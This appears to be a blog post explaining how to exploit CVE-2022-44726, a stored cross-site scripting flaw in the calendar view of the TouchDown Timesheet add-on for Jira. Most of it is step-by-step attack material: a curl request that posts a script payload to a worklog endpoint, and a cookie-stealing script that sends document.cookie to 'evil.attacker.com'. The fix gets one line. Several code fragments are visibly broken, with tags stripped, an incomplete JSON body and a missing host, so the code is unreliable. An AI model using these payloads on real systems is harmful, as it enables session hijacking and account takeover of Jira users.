CVE-2022-44726 - Exploiting XSS in TouchDown Timesheet Tracking Component 4.1.4 for Jira (Calendar View)

Cross-site Scripting (XSS) vulnerabilities enable attackers to inject malicious scripts into web applications. CVE-2022-44726 is one of these critical bugs, found in TouchDown Timesheet Tracking Component version 4.1.4 for Jira. This post gives you an exclusive deep dive, in plain language, into how this flaw works, how to exploit it, and why it matters.

What Is TouchDown Timesheet for Jira?

TouchDown Timesheet Tracking Component is a popular add-on for Jira, letting teams track time and manage work logs with visual tools like a calendar view. If you run Jira for project management, you might have it installed to help with reporting or compliance.

What’s CVE-2022-44726?

CVE-2022-44726 is an improper input sanitization vulnerability found in TouchDown Timesheet Tracking Component version 4.1.4. In plain words: a part of the app fails to clean up user-controlled input before displaying it in the calendar view. This makes it possible for attackers to insert JavaScript (or other code) that runs in the victim’s browser.

How Does the Exploit Work?

Whenever you create a timesheet entry (for example, a work log) using TouchDown, your *description* goes into the database. When the calendar view is opened later, it displays that description — without sanitizing it.

That means you can add <script> tags, HTML, or other mischievous code and it will be executed for any unsuspecting user who views the timesheet/calendar.

Create a Worklog with Malicious Payload

Log in to Jira with any user account that has permissions to create timesheet entries (most team members).

`html

alert("XSS by Evil Corp!")

curl -u user:pass -X POST \

-H "Content-Type: application/json" \

"hours": 2,

"description": "alert(\"XSS!\")"

}' \

https:///rest/touchdown/1./worklog

Victim Opens the Calendar View

Any other user who opens the calendar or reporting view will immediately see the popup (or malicious code will run).

Real-World Impact

- Account hijacking: If the attacker uses a more sophisticated payload (for example, stealing cookies or session tokens), accounts can be hijacked in seconds.

Stealing a User’s Cookie (Education Purposes Only!)

<script>
  fetch('https://evil.attacker.com/steal?c='; + encodeURIComponent(document.cookie));
</script>

Paste that as your worklog description, and when a victim opens the affected view, their cookies are exfiltrated to the attacker.

Mitigation & Fix

As of publishing, TouchDown’s vendor released version 4.1.5 and later, which fix the issue by properly sanitizing input.

References & Further Reading

- CVE-2022-44726 at NVD
- TouchDown Timesheet Atlassian Marketplace
- OWASP XSS Cheat Sheet

Conclusion

CVE-2022-44726 is a strong reminder: if you trust user input, users can own you. Update your TouchDown Timesheet component, review your web stack for XSS elsewhere, and teach your team about the dangers of trusting input fields. Exploits like this one can spread fast through any busy Jira instance.

Stay patched and stay safe!

*Did you find this guide helpful? Let us know or share your war story about encountering XSS in the wild.*

Timeline

Published on: 04/17/2023 13:15:00 UTC
Last modified on: 04/25/2023 19:05:00 UTC